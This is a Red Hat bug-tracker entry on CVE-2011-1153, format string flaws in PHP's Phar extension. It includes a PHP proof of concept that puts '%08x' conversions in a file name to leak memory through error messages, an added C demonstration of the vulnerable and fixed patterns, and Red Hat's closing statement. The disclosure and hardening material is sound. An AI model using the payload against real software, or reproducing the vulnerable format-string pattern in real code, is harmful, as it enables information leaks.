Bug 688378 - (CVE-2011-1153) CVE-2011-1153 php: several format string vulnerabilities in PHP's Phar extension
Status: CLOSED NOTABUG
Product: Security Response
Classification: Other
Component: vulnerability (Show other bugs)
Version: unspecified
Platform: All Linux
Severity: medium
Assigned To: Red Hat Product Security
public=20110314,reported=20110314,sou...
Keywords: Security
Reported: 2011-03-16 18:02 EDT by Vincent Danen
Modified: 2015-06-01 10:36 EDT (History)
Doc Type: Bug Fix
Last Closed: 2011-04-29 18:28:46 EDT

Description Vincent Danen 2011-03-16 18:02:23 EDT
Several format string flaws were found in PHP's Phar extension [1] that could be used to leak some parts of memory via error messages.  These have been corrected in upstream svn [2].  The Phar extension is part of PHP since 5.3.0.

This is demonstrated with the following:

<?php

$x = new PharData('a.php');
$x->loadPhar("%08x.%08x.%08x.%08x.%08x");

?>

% php phar.php 
PHP Fatal error:  Uncaught exception 'PharException' with message 'unable to open phar for reading "00000000.00000008.00000000.bffb3624.081ef712"' in /tmp/tests/phar.php:4
Stack trace:
#0 /tmp/tests/phar.php(4): PharData::loadPhar('%08x.%08x.%08x....')
#1 {main}
  thrown in /tmp/tests/phar.php on line 4

[1] http://bugs.php.net/bug.php?id=54247
[2] http://svn.php.net/viewvc?view=revision&revision=309221
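The PoC above works because the file name ends up being interpreted as a printf-style format rather than as data, so each `%08x` consumes a variadic argument slot that was never supplied and prints whatever happens to be there. The following C program is an added example, not code from the PHP Phar extension or from the reporter: it models the two-stage pattern that produces this bug class (compose an error message containing the attacker-controlled file name, then hand that message to a printf-style exception-raising function as its format string) and places the hardened form beside it. The function names `vuln_open_phar`, `safe_open_phar`, `throw_ex` and `has_conversion_spec` are invented for the demonstration; `throw_ex` only stands in for whatever formatting sink the real code used and records the message in a buffer instead of raising a PHP exception.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Added example, not the Phar extension's code. throw_ex() is a stand-in
 * for a printf-style exception-raising function; it stores the formatted
 * message so the two call sites below can be compared. */
static char last_exception[256];

static void throw_ex(const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    vsnprintf(last_exception, sizeof last_exception, fmt, ap);
    va_end(ap);
}

/* Vulnerable pattern: the composed message is passed AS the format string.
 * Any %-conversions that arrived inside `fname` are interpreted, and
 * vsnprintf reads variadic argument slots that were never supplied. That is
 * undefined behaviour, and in practice it copies stack/register contents
 * into the message: exactly the leak shown in the report. */
const char *vuln_open_phar(const char *fname)
{
    char error[192];
    snprintf(error, sizeof error,
             "unable to open phar for reading \"%s\"", fname);
    throw_ex(error);              /* BUG: attacker data used as format */
    return last_exception;
}

/* Hardened pattern: the format is a fixed literal and the message is an
 * ordinary argument, so "%08x" in the file name is printed literally. */
const char *safe_open_phar(const char *fname)
{
    char error[192];
    snprintf(error, sizeof error,
             "unable to open phar for reading \"%s\"", fname);
    throw_ex("%s", error);        /* FIX: constant format, message as data */
    return last_exception;
}

/* Triage helper: does a string carry a printf conversion (a '%' that is not
 * immediately escaped as "%%")? Strings for which this returns 1 must never
 * reach a format-string parameter. */
int has_conversion_spec(const char *s)
{
    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') {        /* "%%" is a literal percent sign */
            s++;
            continue;
        }
        return 1;
    }
    return 0;
}

int main(void)
{
    /* The PoC file name from the report, shortened to three conversions. */
    const char *poc = "%08x.%08x.%08x";
    printf("vulnerable: %s\n", vuln_open_phar(poc));
    printf("hardened:   %s\n", safe_open_phar(poc));
    printf("needs constant format: %d\n", has_conversion_spec(poc));
    return 0;
}
```

Compile with `-Wformat-security` (or `-Wformat=2`) and the vulnerable call site is flagged as "format not a string literal and no format arguments", which is the cheapest check a practitioner can add to a C build to catch this pattern before it ships; the hex garbage printed by the vulnerable path varies from run to run, while the hardened path always reproduces the file name verbatim.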
Comment 1 Vincent Danen 2011-03-16 18:15:07 EDT
I'm not very familiar with these phar archives, but I suspect these would not be something a user could just upload (or a normal site would allow to be uploaded and then loaded), so I believe this flaw is probably more of a local flaw, than a remote flaw.
Comment 11 Vincent Danen 2011-04-29 18:28:46 EDT
Statement:

Red Hat does not consider this flaw to be a security issue.  It is improbable that a script would accept untrusted user input or unvalidated script input data as a PHAR archive file name to load.  The file name passed to the PHAR-handling functions is therefore under the full control of the script author and no trust boundary is crossed.
